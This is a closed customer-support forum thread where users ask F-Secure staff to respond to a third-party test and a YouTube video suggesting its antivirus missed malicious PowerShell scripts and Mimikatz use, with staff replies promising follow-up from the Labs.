[ Staff needed ] F-Secure failure against powershell script whatever.. :D

Parham
Parham Posts: 103 Enthusiast

Hi F-Secure.

would you guys please forward this article to the LABS?
https://www.mrg-effitas.com/current-state-of-malicious-powershell-script-blocking/

F-Secure failed at a test against powershell script whatever it is.. Smiley Very Happy

 

Thanks!

Comments

  • Hi Parham,

     

    I have passed it to the lab's notice. Once I have any update, I will keep you posted.

  • Parham
    Parham Posts: 103 Enthusiast

    Hi again

     

    dear @Laksh any reaction from LABS yet?

     

    Thanks!

  • Hi Parham,

     

    I'm following up again. Apologies for the delay, I'll update you once I hear from them.

  • Ukko
    Ukko Posts: 3,727 Superuser

    Hello,

     

    Sorry for my reply.

     

    Since there is delay with official response/explanation.

     

    I just able to add that part of this "meanings" (which I able to ask based on this topic)  -> I also asked under another topic:

    https://community.f-secure.com/t5/F-Secure-SAFE/a-Youtuber-claimed-2months-ago/td-p/96356

     

    Where also did not comes official response yet.


    "Connections" between topics can be about this certain tool (for recover/catch passwords from Windows systems); With meanings that if F-Secure "claimed" this tool as malware -> why did not detect it?

    If it not detected as malware -> why F-Secure "claimed" this tool as malware?

     

    With another meanings and my own feelings about topic:

     

    --> even it can be valid concern, but this certain publication probably with limitations... because there is too much many steps which user (?!) have to perform (by own steps) for trouble result (or if not -> I do not able to understand why any of them did not detect by F-Secure or system).

    And mainly F-Secure able to prevent some (?!) certain tricks with powershell scripts (and more oldschool things like html applications); I able to think that F-Secure have detections/design for block powershell-based malware (with some of meanings);

    But anyway maybe possible to tweak or tick for much more 'security'-level (and do not increase false-positive result);

     

    --> but basically it can be something like "user launch Google Chrome and did troublesteps for system" (mainly Google Chrome not detected as malware with such meanings);

    I able to think that with recently introduced "headless chrome"... it quite possible to perform rogue tricks with more valid view, than 'certain tool and powershell scripts';

     

    --> also sadly that there is delay with official statement (or clarification about F-Secure abilities OR if required - their improve steps);

    I recently also did ask F-Secure Labs about certain 'potentially dangerous concern', but received just response with sounds like "we will do not check such concerns and this is not interesting for us"; But basically.. indeed I able to think that F-Secure with enough abilities to research and investigate threat-landscape or malicious threats only by own steps (so.. not required to ask about something or 'ask for attention'); Because -> maybe they do not have enough time for such talking (while required to monitor situation and so).

     

    Thanks!

  • Parham
    Parham Posts: 103 Enthusiast

    Hi again.

     

    dear Ukko, that youtuber video.. probably is a joke, F-Secure cannot bypassed just like that easly. they have bug bounty no one will publish a bug if someone find a real bug, he/she let them know and earn the price! why should publish it for nothing?

    @Lakshdear Lakshmi, i think LABS needs another follow up Smiley Very Happy since your last follow up is about a week ago

  • Ukko
    Ukko Posts: 3,727 Superuser

    @Parham wrote:

    Hi again.

     

    dear Ukko, that youtuber video.. probably is a joke, F-Secure cannot bypassed just like that easly. they have bug bounty no one will publish a bug if someone find a real bug, he/she let them know and earn the price! why should publish it for nothing?

    @Lakshdear Lakshmi, i think LABS needs another follow up Smiley Very Happy since your last follow up is about a week ago


    Hello,

     

    Yes, my own feelings about youtube video -> I also placed under related topic (but I able to think about such videos as about PoC -> because quite likely available to perform related steps, but with more 'critical'-view). And with indeed "bypass" (even it can be reported to F-Secure - if this is 'study'-research; OR not); Most trouble with youtube video that it called as "bypass" (but possible to create more proper wording about);

     

    And also I placed some "additional" ask-words based on this video (which I decided to re-ask under this topic too; both situations have 'Mimikatz' in attack's design. And with one/some of recent articles about Ransomware from F-Secure Labs/Blogs?! they claimed such tool as malware (Microsoft also with related detections/signatures for variants of usage this tool); So... if this is valid statement -> why F-Secure did not detect 'malware' with basic/common view (?!).

     

    Basically -> good to know official statement from F-Secure about such videos (if asked) anyway; Not because this is critical, but because they able to re-check it internally (with many high quality specialists) and re-sure that their design still work as expected (or more good to say -> with enough protection/security).

    At least.... if there is nothing to discuss... possible just did the repeat words like (sorry for quote from F-Secure Labs) ""If you would like to know about the protection capability, our DeepGuard able to monitors applications to detect potentially harmful changes to the  system, and DeepGuard also makes sure that user use only safe applications.  The safety of an application is verified from the trusted cloud service. If the safety of an application cannot be verified, DeepGuard starts to monitor the application behavior."";

    And if later will be some troubles... which do not valid for such meanings... possible to re-ask "why design not improved?!";

    While there is missing response -> possible situation when 'concern' just did not meet investigation. And research will be only if something hacked/breached/leaked (good design maybe, but not about situations when already published some information and not required to 'create' something by own steps). With current two topics -> both situations required many user's own steps and if it will be with another design (when user's do not perform suspicious steps by own actions) -> probably F-Secure able to react partly (based on my feelings);

     

    Thanks!

  • gancal
    gancal Posts: 21 F-Secure Product Expert

    Hi Parham,

     

    First and foremost, we would like to thank you for bringing this video up to our attention.

     

    Our Labs analyst is still studying and fully understanding the test case, attack vector plus detection coverage based on the video. At the moment, we are unable to provide you with an ETA on when we have something concrete. However, rest assured that this issue is not forgotten and we will definitely give you an update when we have one.

     

    Thank you for your patience and contribution to the different insights based on this video.

     

    Regards,

    Calvin Gan

    F-Secure Security Vulnerability Expert

     

  • Ukko
    Ukko Posts: 3,727 Superuser

    Hello,

     

    Sorry for my reply.

     

    @gancal , does any updates about? Does study and fully understanding are completed?

     

    Also, as additional ask:

    Under this F-Secure's article (dated to 01.03.2017): Fileless Malware.... was noted points like:

     

    The attackers utilize Microsoft’s own tools, such as PowerShell, to carry out memory-based attacks through malicious macros that trigger PowerShell to load the malware onto the machine. Detecting these attacks can be hard, as the macros use evasion techniques and a fileless approach to evade file-based detection.
    We earlier published six tips for avoiding macro-based malware – that advice is still very much valid for fileless malware attacks. Our protection engines, including the behavior-based DeepGuard, already block these attack vectors.
    “DeepGuard offers exploit protection to mitigate the exploitation of legitimate applications. It also offers protection against script-based attacks by blocking the execution of the script. This all is essentially what DeepGuard detection is made of: using behavior indicators of compromise.”

     

    So, compare to F-Secure solutions (or only Business solutions) of March -> does this words still valid? Or valid for DeepGuard 6?

    In general, does DeepGuard still 'offers exploit protection' to prevent/mitigate tricks with valid software and script-based attacks?

    Does it valid for such threats (or only signature/fuzzy hashing are useful there)?

     

    Thanks!

This discussion has been closed.
Feedback on New Design